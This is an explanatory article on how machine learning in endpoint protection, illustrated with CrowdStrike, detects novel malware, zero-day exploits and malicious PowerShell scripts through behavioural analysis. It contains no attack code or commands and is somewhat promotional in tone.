AI protects against malware

For readers in a hurry

Modern endpoint protection uses machine learning to detect suspicious behavioral patterns that indicate misuse or malware.
This dynamic protection against novel threats complements static protection, which identifies malware based on its known fingerprints (signatures).
Machine learning is also used to continuously monitor user behavior, identify attacks based on that behavior, and subsequently remediate their causes and effects.
Effective endpoint protection requires self-adapting software that reliably identifies novel threats and initiates appropriate measures.

A tip for trying it out

If you want a great introduction to the topic of Large Language Models (LLMs)—which are used, among other things, to analyze malware in PowerShell scripts—you should watch this one-hour video by Andrej Karpathy. It covers almost every aspect of Generative AI and LLMs and illustrates them with concrete examples. The topic of security is also covered. A "must-read" for every tech-savvy AI enthusiast.

The dynamics of ML

Classic virus scanners and malware detection programs work with so-called signature detection: the virus scanner attempts to match known sequences of bytes to a virus in order to subsequently isolate the infected file.

However, this has the disadvantage that the malware must already be known to the scanner. Furthermore, resourceful malware developers can easily modify the signature time and again so that the scanner fails—a game of cat and mouse.

Modern endpoint protection therefore relies on AI mechanisms, specifically machine learning, where the security software observes all program processes and automatically derives patterns from them to detect anomalies. Such anomalies can include:

Suspicious Wi-Fi access points
New user accounts with high privilege levels
Attempts to lower security levels on the PC
Data exfiltration attempts to malicious IP addresses
Suspicious patterns in network traffic

"Behavioral ML"—also known as UEBA (User and Entity Behavior Analytics)—moves in the same direction by focusing increasingly on user behavior, e.g., does a user suddenly try to open files they do not have access to?

If such suspicious behavior is detected, the security software triggers an alert.

The protective hand

If a threat or even an attack occurs, machine learning is also utilized. For example, leading endpoint protection software like CrowdStrike not only attempts to detect malware early but also identifies its root cause and provides suggestions for remediation.

Furthermore, AI algorithms are used to track down modified malware signatures that would otherwise go unnoticed. Even malware without a signature is detected based on its conspicuous behavior—for example, if it attempts to bypass security mechanisms.

To avoid reinventing the wheel, CrowdStrike draws on a multitude of sources, which are combined to further train and refine its own ML models. After all, effective protection against malware is a continuous battle against "evil." Standing still regularly leads to problems and defeat in this "battle."

Example: Zero-day exploit

We want to illustrate how AI works at CrowdStrike using an example. For this, we have chosen the dreaded zero-day exploits. There is no tool for these pests, even once they have been discovered. Only the complete elimination of the vulnerability can solve the problem.

How does CrowdStrike handle this?

A malware author creates new malware and modifies it to bypass signature-based detection. The malware author then publishes the malware on the internet, where their victims encounter it.
Signature-based malware scanners are unable to recognize the new malware because they do not have the malware's signature in their database. However, CrowdStrike's ML models are able to recognize the new malware because they have been trained on a massive dataset of known malware signatures, including signatures that have been modified to bypass conventional signature-based detection.
Furthermore, CrowdStrike's behavioral analysis is able to detect the new malware because it reveals its suspicious behavior, e.g., attempting to access sensitive data or disabling security controls.
Finally, CrowdStrike's threat intelligence can detect the new malware because CrowdStrike collects and analyzes threat data from a variety of sources. CrowdStrike uses this information to update its ML models and detection rules.

In this way, CrowdStrike uses AI/ML in a combination of measures and sources to detect zero-day exploits as reliably as possible—even when they are novel.

Example: PowerShell

PowerShell, which is popular and very powerful on Windows, is also frequently used by hackers to introduce malware into companies. This is where Deep Learning models come into play, analyzing the attacker's source code and detecting it accordingly.

Using Deep Learning models, the most important code segments are automatically extracted from PowerShell scripts.
The AI analyzes the extracted code segments to identify malicious code flows.
The AI compares the code logic with a database of known malicious and benign PowerShell scripts.
If the AI detects malicious code logic, it generates an alert.

Without artificial intelligence, it will be difficult to banish the dangers from the internet. For this reason, an understanding of how the security software used in your own company works is essential.